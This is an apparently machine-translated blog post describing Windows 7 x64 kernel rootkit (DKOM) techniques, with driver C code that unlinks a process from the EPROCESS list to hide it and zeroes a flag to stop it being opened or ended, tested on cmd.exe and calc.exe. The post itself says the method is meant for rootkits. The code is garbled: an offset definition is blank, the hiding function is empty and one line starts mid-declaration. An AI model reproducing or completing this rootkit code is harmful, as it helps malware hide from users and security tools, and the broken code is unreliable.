DKOM Hiding and protecting processes

The main operation is the linked list , Node content and modification .

DKOM  The essence of hiding process and protecting process is operation  EPROCESS  structural morphology , When using different systems, pay attention to the relevant definitions , Determine down offset , The following data is based on win7 64 take as an example .

shut   notes   Two   individual   become   member  : ActiveProcessLinks  and  Flag .

ActiveProcessLinks  Put each EPROCESS  The structure is connected into “ Double linked list ”,ZwQuerySystemInformation
When you enumerate a process, you enumerate this linked list , If a  EPROCESS  Remove from it ,ZwQuerySystemInformation
You can't enumerate the processes that have been disconnected , And depending on this function  RING3  The enumeration process function of is also invalid ; But Flag  Set up  0  after ,OpenProcess 
The function returns a failure . But it's important to note that , use   use  DKOM   To protect the process can be very dangerous , For example   call  CreateProcess  
Meeting   fail , and   process   sign out   but   If you don't remove the protection , There is a certain probability that blue screen will be caused . in a word ,DKOM   Protection process   and   Hide process   Only for  ROOTKIT 
, It does not apply to regular software . The code for hiding and protecting processes is as follows :

*Process); NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);
// Target process PEPROCESS audiodg=NULL, dwm=NULL; ULONG op_dat; // Offset definition #define
// get EPROCESS PEPROCESS GetProcessObjectByName(char *name) { SIZE_T i;
for(i=100;i<20000;i+=4) { NTSTATUS st; PEPROCESS ep;
st=PsLookupProcessByProcessId((HANDLE)i,&ep); if(NT_SUCCESS(st)) { char
*pn=PsGetProcessImageFileName(ep); if(_stricmp(pn,name)==0) return ep; } }
return NULL; } // Removes the specified item from a doubly linked list VOID RemoveListEntry(PLIST_ENTRY ListEntry) { KIRQL
OldIrql; OldIrql = KeRaiseIrqlToDpcLevel(); if (ListEntry->Flink != ListEntry
&& ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry &&
ListEntry->Flink->Blink == ListEntry) { ListEntry->Flink->Blink =
ListEntry->Blink; ListEntry->Blink->Flink = ListEntry->Flink; ListEntry->Flink
= ListEntry; ListEntry->Blink = ListEntry; } KeLowerIrql(OldIrql); } // Hide process
VOID HideProcess(PEPROCESS Process) {
} // Protection process ULONG ProtectProcess(PEPROCESS Process, BOOLEAN bIsProtect, ULONG v) {
ULONG op; if(bIsProtect) { op=*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET);
*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=0; return op; } else {
*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=v; return 0; } } VOID test() {
audiodg=GetProcessObjectByName("calc.exe");DbgPrint("calc: %p\n",audiodg);
if(audiodg) { op_dat=ProtectProcess(audiodg,1,0); ObDereferenceObject(audiodg);
} dwm=GetProcessObjectByName("cmd.exe");DbgPrint("cmd: %p\n",dwm); if(dwm) {
HideProcess(dwm); ObDereferenceObject(dwm); } }

results of enforcement : The calculator won't end ,cmd.exe There is no process

however cmd There is this :


©2019-2020 Toolsou All rights reserved,
VUE+Canvas Achieve desktop Pinball brick elimination games C/C++ Memory model 2019PHP Interview questions ( Continuously updated )PHPspringboot2 Separation of front and rear platforms ,token Put in header Pit for verification Vue SpringBoot conduct Excel download element-ui Step on pit record 45 The 12-year-old programmer was turned down , Is the workplace wrong ?Python Web frame Pandas Fundamentals of statistical analysis _ data processing (DataFrame Common operations )Java Misunderstanding —— Method overloading is a manifestation of polymorphism ?